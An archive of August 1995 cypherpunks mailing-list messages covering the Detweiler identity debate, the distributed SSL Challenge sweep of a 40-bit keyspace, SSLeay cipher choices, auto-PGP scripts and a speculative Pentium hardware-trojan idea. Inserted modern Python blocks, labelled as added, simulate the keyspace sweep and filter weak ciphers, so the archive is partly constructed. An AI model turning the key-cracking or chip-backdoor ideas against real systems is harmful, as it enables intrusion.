> The idea of a "true name" is a very problematic and perplexing 
> concept in the same way that the concept of "absolute space" is
> troubling to the theory of Newtonian mechanics, which Einsteinian
> relativity sought to remove, starting with the premise that "there is
> no preferred reference frame". The cypherpunks cite the absurdity of
> the "true name" concept in an analogous argument and attempt to
> discredit Detweilerian theories on this basis. However the theory is
> not based on "true names" but the existence of "entities", hence this
> cypherpunk position translated to its most basic form, becomes,
> essentially, "unique communication sources (such as 'humans') don't
> exist"  (or analogously in the Einsteinian metaphor, "mass and energy
> do not exist").

I have discounted his/her thesis on the basis of its lack of accurately
predicting or reflecting reality and on no other basis.  It may be an
interesting theory, but in practice it seems to have been refuted.

...
> The essence of the idea of "true identification" is that there is a
> one-to-one mapping between "entities" and "true names". The
> representation of the "true name" is irrelevant. Detweiler certainly
> did not make the absurd claim that a "true name" had any special
> syntactic properties. He also did not claim that "true name
> registries" had to be erected to provide the feature, although they
> could support it. At the core of the concept is the idea that every
> entity in a "truthful" system must make a choice as to their actual
> name identification and not "lie" about its properties in messages
> that refer to it. 

So legal name changes are not allowable? Two people can't have the same
name? This doesn't map to the current reality.  It sounds more like a
government imposed identity number system - like the one in Nazi Germany
that contributed to the extermination of 6 million Jews.  I'm against it.

...
> Detweiler countered by suggesting that communities with communications
> based on trust and honesty and the contrary not only both exist, but
> that discrepancies between the two probably existed as well and
> furthermore were worthy of study. (Again, he conjectured that the
> "dishonest" communications forums led to "disharmony" without further
> defining the term.) All these distinctions lie in the area Detweiler
> denoted under the heading "morality" which again the cypherpunks
> generally deny exists in an abstract communications system.

He said - she said.  It's just a bunch of baloney.  Lies are often the
basis for harmony and being "too honest" generally gets you very little. 
The important thing about communication is that you get other people to
think about the things you think about.  It's just a way of affecting
brain states in other entities and nothing more.  Truth, lies, and video
tape can all do this.

> Hence the key formal ideas of the overall theme that communications
> systems could lead to significantly different scenarios based on the
> "honesty" or "truthfulness" of members of a community with respect to
> identity had been addressed for the first time by Detweiler,

I appreciate Detweiler's attempt, but it's a failure (oops better try
only a partial success) because it doesn't reflect the reality.

> but at
> great cost to Detweiler's credibility within the cypherpunk circles,
> which have rebuffed, ridiculed, and excommunicated him.

If you can't take the heat, stay out of the chemistry lab.  I say lots
of things that people don't like and gripe about.  If Detweiler can't
shake it off and come back with something better, s/he's overly
sensitive.  What do you expect? That people will embrace your
characterization of them just because you think it's interesting? If
Detweiler is really right, then s/he should fight back with the
strongest weapons that exist in this forum - the facts.  As far as I can
see, the facts are against Detweiler, but s/he may prove me wrong in
open debate, and as far as I can tell, the cypherpunks will agree with
Detweiler if s/he is right.

> Detweiler
> tended to take this as evidence that the core cypherpunk philosophy
> was not about seeking privacy, which he went to pains to demonstrate
> existed in his "honest" systems, but rather a sort of denial of the 
> existence of morality in cyberspace-- that the question of "whether a
> message 'lies' about its author's identity" is inherently
> meaningless, a premise he strongly rejected.

On this, Detweiler is clearly incorrect from my view.

I don't want to waste further space on this.  I'm already sorry I spoke
up on it and I haven't even sent the mail yet. 

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 25 Aug 95 04:45:44 PDT
To: Piete.Brooks@cl.cam.ac.uk (Piete Brooks)
Subject: improving the distributed computation
In-Reply-To: <"swan.cl.cam.:226410:950825111043"@cl.cam.ac.uk>
Message-ID: <9508251143.AA15702@all.net>
MIME-Version: 1.0
Content-Type: text


I thought I might give some free (and worth it) advice on the next round
of attempts.  This distributed computation is somewhat related to viral
computation, and I have learned a few things over the years that may be
helpful in doing a better job of it.

1) Abandon the central command way of doing things.  Little if any
communication is required for this computation, it should be
self-distributing to and between volunteer sites.  That makes it ideal
for implementation as a safe virus. 

2) Give these computations a defined and limited lifetime.  The problem
you have with old versions is because they don't die automatically or
even check to see if they are up-to-date and update themselves.

3) Use randomness to break up the search space and redundantly perform
the computation.  This should eliminate the problems with malicious
key-space requests, etc.

4) Use feedback in the form of selective survival/replication to
optimize the search and allocate search space.  If a processor goes
quickly, give it more to do - if it goes slowly, give it less.  This
will produce an overall system that adapts with time to the changes in
network and system usage so as to optimize overall performance as a
function of time.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236
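
Points 2 to 4 of the message above, sketched as an added simulation (not code from the original post or from the brclient/brloop project): it compares a server that hands each segment out once with clients that pick segments at random, when a share of the reports comes from clients that claim a sweep they never did. The segment count, the 20% dishonest share, and all function names are assumptions made for the example.

```python
"""Constructed simulation of random, redundant keyspace sweeping."""
import math
import random

SEGMENTS = 1 << 10   # constructed keyspace, split into 1024 segments


def central_search(target, liar_fraction, rng):
    """Server hands every segment out exactly once.

    A dishonest client acknowledges its segment without sweeping it, so the
    key is lost whenever the target segment is handed to such a client.
    Returns (found, segments_handed_out).
    """
    holder_is_honest = rng.random() >= liar_fraction
    return holder_is_honest, (target + 1 if holder_is_honest else SEGMENTS)


def random_search(target, liar_fraction, rng, max_draws):
    """No server: every sweep picks a segment uniformly at random (point 3).

    Segments get swept more than once, so one false "nothing here" report
    cannot hide the key for good. Returns (found, draws_used).
    """
    for draw in range(1, max_draws + 1):
        segment = rng.randrange(SEGMENTS)
        honest = rng.random() >= liar_fraction
        if segment == target and honest:
            return True, draw
    return False, max_draws


def miss_probability(draws, liar_fraction):
    """Chance that no honest sweep has hit the target after `draws` picks."""
    return (1.0 - (1.0 - liar_fraction) / SEGMENTS) ** draws


def draws_for_miss(miss, liar_fraction):
    """Smallest number of random picks with miss probability <= `miss`."""
    per_draw = (1.0 - liar_fraction) / SEGMENTS
    return math.ceil(math.log(miss) / math.log(1.0 - per_draw))


def next_batch(batch, seconds_taken, target_seconds=600.0, low=1, high=1024):
    """Point 4: fast workers get more segments per batch, slow ones fewer.

    The change per round is clamped to a factor of two so that one noisy
    timing does not swing the allocation.
    """
    scale = target_seconds / max(seconds_taken, 1e-9)
    scale = min(2.0, max(0.5, scale))
    return max(low, min(high, round(batch * scale)))


def may_run(now, expires_at, my_version, minimum_version):
    """Point 2: a client stops once it is past its lifetime or out of date."""
    return now < expires_at and my_version >= minimum_version


def success_rate(search, trials, liar_fraction, seed, **kwargs):
    """Fraction of trials in which the hidden segment was found."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(trials):
        found, _used = search(rng.randrange(SEGMENTS), liar_fraction, rng,
                              **kwargs)
        hits += found
    return hits / trials


if __name__ == "__main__":
    liars = 0.2   # constructed: one report in five is from a dishonest client
    print("central hand-out :", success_rate(central_search, 400, liars, seed=1))
    print("random, 5x cover :", success_rate(random_search, 400, liars, seed=1,
                                             max_draws=5 * SEGMENTS))
    print("picks for 1% miss:", draws_for_miss(0.01, liars))
```

The price of the random scheme is redundant work: it buys its resistance to false reports with several times the sweeps of a perfect single pass.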



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 25 Aug 95 04:53:37 PDT
To: cypherpunks@toad.com
Subject: Two URLs of interest
Message-ID: <v02120d00ac63647ee6c1@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

From: Tom Limoncelli <tal@plts.org>
Subject: Two URLs of interest
To: www-buyinfo@allegra.att.com
Date: Thu, 24 Aug 95 22:26:14 EDT
Cc: mp@allegra.att.com, drew@allegra.att.com, rn@big.att.com,
        skbk@research.att.com, tommy@big.att.com, rjf@big.att.com,
        varga@big.att.com, geoffc@allegra.att.com

First, (and not really related to this mailing list) is an article by
Arnold Kling explaining why Netscape stock was so popular, and why
people who purchased stock in the first couple of hours are now
$13/share in the hole.  (stock opened at $71, declined to $53ish, and
now hovers at $58ish)   He also explains where he thinks the price will go.
        http://www.enews.com/contrib/bagholders.html

Second, Pat Robertson's "The 700 Club" now has a WWW site and on it he
advertises a new video tape http://the700club.org/cbn/telethon.html
where he predicts the end of the world.  What has that got to do with
"www-buyinfo"?  Well, one segment is described as:
        "This story examines the oncoming rush to digital cash [...]
        and how quickly businesses, financial institutions, and even
        the government are moving in this direction."
For those of you without a copy of Revelations handy, this is a Mark
Of The Beast according to him.  You'll have to buy the video to find
out why.  Revelations is on-line (along with the whole bible) at:
        http://www.gospelcom.net/cgi-bin/bible?&passage=Revelation


Sorry for the almost completely non-technical post.

Have a good weekend, y'all!
--tal

--
     Tom Limoncelli -- tal@plts.org (home) -- tal@research.att.com (work)
http://mars.superlink.net/user/tal     "I tried netsex, didn't like it."
http://www.qrd.org/QRD/www/usa/nj       "Maybe you just haven't met the
http://www.qrd.org/QRD/www/usa/nj/BNNJ      right keyboard?"

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Fri, 25 Aug 95 00:34:10 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Crypto DLL's/SSLeay 0.4.5
In-Reply-To: <199508241311.JAA13033@frankenstein.piermont.com>
Message-ID: <Pine.SOL.3.91.950825081153.9077E-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 24 Aug 1995, Perry E. Metzger wrote:
> Eric Young writes:
> > On the PGPphone issue, I personally feel SSLphone would be a much 
> > better way of doing things.
> Oh, yeah? No user certificates, no way to verify what's on the other
> end. No assurances that you aren't being tricked into using a weak
> algorithm because negotiation doesn't take place under cover of
> signature. Lots of little potential cracks. Thanks, but no thanks.

:-) Agreed, it depends on how you use SSL and implement it, I have not 
added it yet but I'll put in my library hooks so an application can 
refuse to use certain ciphers that are in the library.  Currently you 
can specify your preference of cipher and there 
is a call to return the cipher being used on an SSL connection.  The most 
recent version of SSLtelnet of ours prints the subject name of the server 
and the cipher being used, just so you can know if you are using RC4-40 :-).

As for authentication, agreed, the key distribution problem for X509 
needs work but still, if the audio is good enough, you should know who is 
on the other end :-).

> This is not to slight your code. I'm slighting the protocol.
none taken, my main support for SSL is that there is minimal work to be 
done to make an application support encryption (+ perhaps authentication) 
over a connection.  This means that any work done to improve the SSL 
library (as in certificate distribution and verification) will instantly 
be able to be added to all applications using that SSL library.  If each 
one of 15 different applications has a different cipher/authentication 
package, there is 15 times the work to upgrade.
Hell, to put PGP type authentication in SSL would probably not be very hard.
It would require a new certificate type and a new 'verify certificate' 
routine and that would be about it.
Basically I'm a bit lazy, I like to write libraries and then keep on 
reusing them.

> > For phone over modem, authentication is not really required
> And why is that?
Again, if the voice is clean enough, you should know who is at the other end.
If you are talking about a program being at the other end, well that's 
another matter :-).

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)
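
The two hooks discussed in the message above (refusing certain ciphers before the handshake, and asking which cipher and server subject a connection ended up with), shown as an added example using Python's standard `ssl` module rather than SSLeay's own API. The refusal patterns, the 128-bit floor, and the function names are assumptions of this sketch, not part of the original post.

```python
import fnmatch
import socket
import ssl

# Assumed application policy for this sketch (not SSLeay's own lists):
# OpenSSL-style suite names to refuse, and a floor on secret key bits.
REFUSED_PATTERNS = ("EXP*", "*RC4*", "*NULL*", "*DES*", "*MD5*",
                    "ADH-*", "AECDH-*")
MIN_SECRET_BITS = 128


def is_refused(name, secret_bits):
    """True if the suite is too short or matches a refused pattern."""
    if secret_bits < MIN_SECRET_BITS:
        return True
    return any(fnmatch.fnmatchcase(name, p) for p in REFUSED_PATTERNS)


def restrict(ctx):
    """Hook 1: before any handshake, drop refused suites from the context.

    TLS 1.3 suites are left out of the string because OpenSSL configures
    them separately from the classic cipher list.
    Returns the list of suite names that remain enabled.
    """
    keep = [c["name"] for c in ctx.get_ciphers()
            if c["protocol"] != "TLSv1.3"
            and not is_refused(c["name"], c["strength_bits"])]
    ctx.set_ciphers(":".join(keep))
    return keep


def check_connection(cipher_info, peer_subject):
    """Hook 2: after the handshake, judge and describe what was negotiated.

    `cipher_info` is the (name, protocol, secret_bits) tuple returned by
    SSLSocket.cipher(). Returns (acceptable, one_line_report).
    """
    name, protocol, bits = cipher_info
    report = f"peer={peer_subject} cipher={name} ({protocol}, {bits} secret bits)"
    return (not is_refused(name, bits)), report


def connect_and_report(host, port=443):
    """Connect, print-ready report of server subject and cipher, or refuse."""
    ctx = ssl.create_default_context()
    restrict(ctx)
    with socket.create_connection((host, port)) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            # getpeercert()["subject"] is a tuple of RDNs of (key, value) pairs
            subject = dict(rdn[0] for rdn in tls.getpeercert()["subject"])
            ok, report = check_connection(tls.cipher(),
                                          subject.get("commonName"))
            if not ok:
                raise ssl.SSLError(f"refused: {report}")
            return report
```

Checking the negotiated suite after the handshake is what catches a connection that was steered to a weak cipher even though stronger ones were available.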





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Fri, 25 Aug 95 06:30:05 PDT
To: cypherpunks@toad.com
Subject: [pagre@weber.ucsd.edu: computers are the crime scenes of the future]
Message-ID: <9508251329.AA27206@grape-nuts>
MIME-Version: 1.0
Content-Type: text/plain



Resent-Date: Thu, 24 Aug 1995 08:08:10 -0700
Date: Thu, 24 Aug 1995 07:59:52 -0700
From: Phil Agre <pagre@weber.ucsd.edu>
To: rre@weber.ucsd.edu
Subject: computers are the crime scenes of the future
Resent-From: rre@weber.ucsd.edu
Reply-To: rre-maintainers@weber.ucsd.edu
X-Url: http://communication.ucsd.edu/pagre/rre.html
X-Mailing-List: <rre@weber.ucsd.edu> archive/latest/793
X-Loop: rre@weber.ucsd.edu
Precedence: list
Resent-Sender: rre-request@weber.ucsd.edu

Date: Thu, 24 Aug 1995 01:39:07 -0700 (PDT)
From: Michael Papadopoulos <papadop@PEAK.ORG>
Subject: Proper Methods for Seizing Computers from Criminals

[ This is the ASCII transcript of a News Release. I have not transcribed 
additional informative paragraphs which describe the IACIS and the more 
than 150 different law enforcement agencies which have sent their "best 
computer specialists to our training conferences ... since 1991. ]

***************************************************************
P.P.B CHIEF'S OFFICE  TEL: 503-823-0342       Aug. 18, 95  16.15  
..............

City of Portland, Oregon, Bureau of Police
Vera Katz, Mayor,
Charles A. Moose, Chief of Police
1111 SW 2nd Ave..
Portland Oregon 97204

Lieutenant C.W. Jensen
Public Information  Officer
phone: 503 -823-0010
Digital Pager : 790-1779	      

August 18, 1995

NEWS RELEASE

CHIEF MOOSE TO OPEN 6TH ANNUAL  IACIS TRAINING CONFERENCE

	Chief Charles Moose will deliver the opening remarks at the 6th 
Annual IACIS Training Conference at the Hilton Hotel  in Portland on 
Monday, August 21, 1995 at 10,00 a.m. IACIS is the acronym for the 
International Association of Computer Investigative Specialists, 
headquartered here in Oregon.
	IACIS was founded by Sgt. Tom Seipert of the Portland Police 
Bureau, and specializes in training law enforcement officers in the 
proper methods of seizing computers from criminals, and then extracting 
items of evidence. Computers are the crime scenes of the future, and 
require special training to seize and examine.  The conference will begin 
with a series of mock computer raids on August 21, 1995, and end on 
September 1, 1995, with information on the latest technological changes 
the investigators need to worry about.
	Approximately 150 students will be attending the conference, some 
from as far away as Australia, and the major agencies such as the FBI, 
DEA, Secret Service, IRS Internal Security, and the Georgia Bureau of 
Investigation will be represented.
	For additional information about this conference, and questions 
regarding computer crime investigations, contact Sgt. Tom Seipert at the 
Hilton hotel, 274-4087. He will be at this number Friday August 18th as 
well as Saturday and Sunday, August 19th and 20th.

*********************************************************************




---
Concurrent VLSI Arch. Group     545 Technology Sq., Rm. 610
MIT AI Lab                      Cambridge, MA 02139 (617)-253-0972




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Fri, 25 Aug 95 10:31:46 PDT
To: Piete.Brooks@cl.cam.ac.uk
Subject: Re: Cypherpunk Brute Squad [Re: SSL Challenge: Server problems]
Message-ID: <9508251723.AA18139@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> current requirements
> ====================
> 
> PLEASE ensure that you are using a brclient of at least 0.14
> ("grep comment.inffo brclient" to discover what you are using)
> You can update brclient while brloop is running.
> Some people are still running old versions, and this is hammering the server.
> 
> It also helps to run at least brloop 0.05 ("grep BRLOOPCOMMENT brloop").
> 

Unfortunately the web page under "Socket based key doler" points 
at brclient 0.13 and brloop 0.04.  Could you fix this please:)

Thanks,

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 25 Aug 95 07:24:04 PDT
To: cypherpunks@toad.com
Subject: SSL Challenge: Are we in trouble?
Message-ID: <9508251423.AA15417@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, the server appears to be unable to serve cgi scripts - I get 
'500 - server error' whenever I try. I cannot report the ~500 segments
I swept overnight, nor get new keyspace.

I think it's gotten to the point where the server is the bottleneck on 
this operation - we seem to have plenty of cpu for sweeps. This will
damage our primary goal - to demonstrate how fast 40 bits can be
swept.

Piete, Adam, could you put a note on the /bute/ root page describing the
server status?

Thanks





 

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nag.cs.colorado.edu>
Date: Fri, 25 Aug 95 10:20:09 PDT
To: "Henry W. Farkas" <hfarkas@ims.advantis.com>
Subject: Re: Auto-pgp for pine/elm/tin
In-Reply-To: <Pine.A32.3.91.950825120224.63029A-100000@pangloss.ims.advantis.com>
Message-ID: <199508251719.LAA06763@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

My thanks to Henry for a glowing recommendation of my product.  Just a few
clarifications:


Henry W. Farkas <hfarkas@ims.advantis.com> wrote:

> Yes, it exists, and I'm using it now.  I've tried competing products and 
> found this to be the cleanest, smoothest and easiest to install.  I have 
> no personal, commercial or financial interest in this product.   It does 
> "auto-pgp" for pine, elm and tin.  


"Bryce's Auto-PGP", or "BAP", is an sh script, so it can be integrated with
most Unix programs.  Pine, Elm, trn, mh are the only programs that I have
personally run it with.  (Unless you count "finger" and "cat"...)

 
>  ***********************************************************************
>  *  BAP v.1.01                                                         *


The current version is BAP v1.0beta in second beta-test.  I'm pretty much 
just waiting on reports from the second batch of beta-testers and then 
I'll call it 1.0 and send it out to those who requested the first non-beta 
release.


>  *  URL: <http://cs.colorado.edu/~wilcoxb/home.html>                   *


I have no working WWW page at the moment.  When I release bap v1.0 I will
have a page at http://ucsu.colorado.edu/~wilcoxb/bap.html and possibly at
other sites.


> I also found the author responsive to my comments and suggestions.
> Just please do *-NOT-* put your pass phrase in a cleartext file!


BAP gives the user the option of putting her passphrase in a temporary
cleartext file.  This is to help people who can't input the passphrase
manually because their mail program is stingy with stdin.  Putting your
passphrase in a temporary cleartext file isn't a good idea, but it is usually
a better idea than putting it in an environment variable like PGPPASS.  (Ref:
Derek Atkins "appnote.txt" which comes with PGP 2.6 distributions.)


I'm looking forward to the first general release of BAP.


Bryce

signatures follow:


                                 +                                           
    public key on keyservers     /.       island Life in a chaos sea         
    or via finger 0x617c6db9     /             bryce.wilcox@colorado.edu     
                                 ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMD4GKPWZSllhfG25AQG0eAQAqL0+24+RHdeV6Vb4pxz8ieoD2MuAOXNb
hb+cFh3jmokqpIFdnJbPGxbZKIUesbJkh8JkQKRW0iKbTA4UsnAVtD2qksG1qSdH
ebC5G77StWlgLZ8E62KOYIruCcj/uXE0oKchEyqvcqIb82TKdwp/2C7Hn2NcCbbN
TYKDM6XtsPY=
=eZbY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 25 Aug 95 08:22:01 PDT
To: trei@process.com
Subject: Re: SSL Challenge: some thoughts on the process.
Message-ID: <199508251521.LAA17497@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:24 PM 8/24/95 -6, Peter Trei wrote:

>3. Start time was a little ragged - 1800 GMT was named, but the server 
>seemed to come up at 2PM east coast time, which is (I think) 1900 GMT. I 
>think that if we selected 8AM west coast time (1600 GMT?) more people 
>would come online more quickly.

1400 EDT=1800 GMT.  This is because GMT=\BST.  GMT always stays the same and
does not become British Summer Time (or whatever it is Brussels is making
the UK call its time zone these days).

Another general problem though is that Monday is August Bank Holiday in the
UK.  That might further delay UK office-based result reporting.  Start
day-of-the-week should be something like Tuesday.

DCF

"When one has a peer-to-peer network, it means that 'all Nodes are created
equal, that they are endowed by their Creator with certain unalienable
Rights, that among these are Life, Liberty, and the Pursuit of Happiness'."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 25 Aug 95 08:26:53 PDT
To: cypherpunks@toad.com
Subject: KGB_laf
Message-ID: <199508251526.LAA09545@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-25-95. NYPaper:


   "C.I.A. Still in Dark on Spy's Damage."

      Eighteen months after the arrest of Aldrich H. Ames,
      Moscow's mole inside the Central Intelligence Agency,
      the agency has still not sounded the depths of the
      damage he did. The process of looking backward to
      reconstruct the past and understand the present -- the
      business of "walking back the cat," in espionage argot
      -- has proved immensely frustrating. Often he did not
      know the true names or roles of the people he betrayed.
      The Soviet (and later the Russian) intelligence services
      forced some of the men Mr. Ames betrayed to become pawns
      in a game of deception, using them to feed false
      information on some of those operations to the C.I.A. in
      an effort to mislead and mystify the agency. The C.I.A.
      became a laughing stock for the way in which it
      investigated itself once it knew its Soviet agents had
      been betrayed.


   8-25-95. W$Japer:


   "Russia's Threat Beneath the Surface."

      Most elements of Russia's military arsenal are
      shrinking in numbers and effectiveness. Yet Russia is
      still completing construction of submarines begun in the
      Soviet era, on about the same timetable as the Soviets
      produced them. Recently, it laid the keel for an even
      more advanced submarine and will enter the next century
      with the largest nuclear submarine fleet in the world.
      That new Russian subs are so quiet is attributable in
      part to the skill of Russian scientists and engineers,
      in part to Western technology illicitly acquired, and in
      part to help from two convicted American spies, John
      Walker and Jerry Whitworth, who for many years sold U.S.
      secrets to the Soviet Union.


   Pair of Karlas: KGB_laf (14kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Fri, 25 Aug 95 02:43:12 PDT
To: cypherpunks@toad.com
Subject: Re: Article in Time Magazine
Message-ID: <9508250941.AA00683@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



> All the more reason to use Linux or FreeBSD - an OS you have the source for,
> on hardware that you can examine.


How would you want to examine a pentium processor?

Just an idea:

Take the block move instructions and attach a little state machine.
If a certain sequence of bytes is detected, a fuse somewhere on the chip
is burned and the processor could switch irreversibly into a mode where
it does partially incorrect calculations. Send someone an email, an IP packet
or an ethernet packet and you can expect the packet to be moved by a
block move command. 


Hadmut
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Fri, 25 Aug 95 08:51:26 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Florida Drivers Permits
Message-ID: <Pine.PMDF.3.91.950825114959.623152053C-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Will, starting next year, contain a digitized photo, plus the current 
info.  The Miami Herald reports that the technology could also be used to 
store "other" info, such as medical data, or "could be" used by banks.

Anyone know any details about the technology?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter F Cassidy <pcassidy@world.std.com>
Date: Fri, 25 Aug 95 08:56:32 PDT
To: cypherpunks@toad.com
Subject: All about Bernstein
Message-ID: <Pine.3.89.9508251129.A27523-0100000@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain



Folks,

I'm the guy who authored an upcoming piece about Bernstein's lawsuit 
with the State Department for WIRED. WIRED loves the piece but, in the 
style of popular mags, wants more personal stuff on Bernstein, who is 
super articulate about the science and law of crypto but super shy about 
his heroic self. (Guy wouldn't even disclose his age! Had to threaten to 
throw myself in front of a bus to get him to tell me he's from Long 
Island!) Editor thinks guy comes across as a ghost, not surprisingly. . .

One fellow from the list, following up an appeal I made here for Friends
of Bernstein to call me and tell me about the litigant's best qualities,
I'd appreciate greatly hearing from again. He called when I'd pretty much 
passed deadline for manuscript delivery. I'm calling Dan again, but after 
one trip to Delphi, I dunno if the responses from the Oracle will be any 
more forthcoming.

Thanks and regards to all,

Peter Cassidy






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Henry W. Farkas" <hfarkas@ims.advantis.com>
Date: Fri, 25 Aug 95 09:04:24 PDT
To: cypherpunks@toad.com
Subject: Auto-pgp for pine/elm/tin
Message-ID: <Pine.A32.3.91.950825120224.63029A-100000@pangloss.ims.advantis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> Does anyone know of an addon to the Pine mailer that supports PGP? 
> the only PGP software i could find required me to first compose a
> letter in an editor then run it through a pgp signature program
> then finally read it into my favorite mailer.
> 
> I'm looking for something that is hopefully transparent, or if not
> relatively quick to do.
> ________________________________________________________________________
> Sameer Manek                Seawolf@challenger.atc.fhda.edu         
> ________________________________________________________________________

- ------------------------------------------------------------------------

Yes, it exists, and I'm using it now.  I've tried competing products and 
found this to be the cleanest, smoothest and easiest to install.  I have 
no personal, commercial or financial interest in this product.   It does 
"auto-pgp" for pine, elm and tin.  

 ***********************************************************************
 *  BAP v.1.01                                                         *
 *  Written August 1995 by Bryce Wilcox                                * 
 *  e-mail: <bryce.wilcox@colorado.edu>                                *
 *  PGP key id: <617C6DB9>                                             *
 *  snail mail: <2228 Canyon Blvd, Apt. 1E, Boulder, CO, 80302>        *
 *  URL: <http://cs.colorado.edu/~wilcoxb/home.html>                   *
 *  BETA TEST VERSION!  DO NOT DISTRIBUTE!                             *
 * (Note that documentation, among other things, is still unfinished.) *
 ***********************************************************************

I also found the author responsive to my comments and suggestions.
Just please do *-NOT-* put your pass phrase in a cleartext file!

- ------------------------------------------------------------------------

===========================================================================
     Henry W. Farkas      |      Me?    Speak for IBM?    Fat chance.
 hfarkas@ims.advantis.com |------------------------------------------------  
   hfarkas@vnet.ibm.com   |     http://newstand.ims.advantis.com/henry
      henry@nhcc.com      |          http://www.nhcc.com/~henry 
- ---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52  B3 80 34 1C CE 38 EC 53
 Public key at: pgp-public-keys@pgp.mit.edu, and other popular key servers.
- ---------------------------------------------------------------------------
Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not
  fast, but it's not bad, and we're cheaper than the guy down the street!"
===========================================================================



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMD30WaDthkLkvrK9AQF6sQP/fVen7ZI4DbgC14y+NPdZYOjaRQ9/jQNT
d4StD638OoBRkO7b8efiTd/rNULwuzSPKDiplKwRdE8Bboh4FdSWYvz6wfqgNJcd
D3imouQcEt+erjEC2H5haQyZwBHeNNR9mTYhkzoBt4+jMqsRCECduaExyHUOTWFj
euOkRqTJ0l4=
=2q74
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Fri, 25 Aug 95 04:11:59 PDT
To: jim@acm.org
Subject: Re: Cypherpunk Brute Squad [Re: SSL Challenge: Server problems]
In-Reply-To: <199508250059.RAA02668@mycroft.rand.org>
Message-ID: <"swan.cl.cam.:226410:950825111043"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


**** Anyone participating in the SSL Challenge who has logs of their searches
**** please ensure you read "What to do if you have logs" below

** Anyone who is running a brclient earlier than 0.14 or a brloop earlier
** than 0.05 please ensure you read "current requirements"

> Live and/or learn

The purpose of this project was the latter ...

> -- looks like the performance is a little better now that they're handing out
> bigger chunks.

That is just one of the tweaks I made ...

> The important thing is to learn something new each time so the next one goes
> more smoothly.

Indeed -- the current project is a merge of three I had planned ...

> Should be nicer with hierarchical servers and so on for the next challenge...
> DES or lobotomized DES or whatever.

Yeah .... :-)



This project arose from the "failed" rc4-40 attempt.
Personally I think it worked -- it showed that it was possible to scan a 40 
bit address space performing the kind of manipulations needed for brute force 
attacks.

The WWW interface was a pain as it required users to do something, so the norm 
was to allocate large chunks, etc.
Also collating the results was a nightmare !

So we decided that cutting the people out would be a good idea all round.
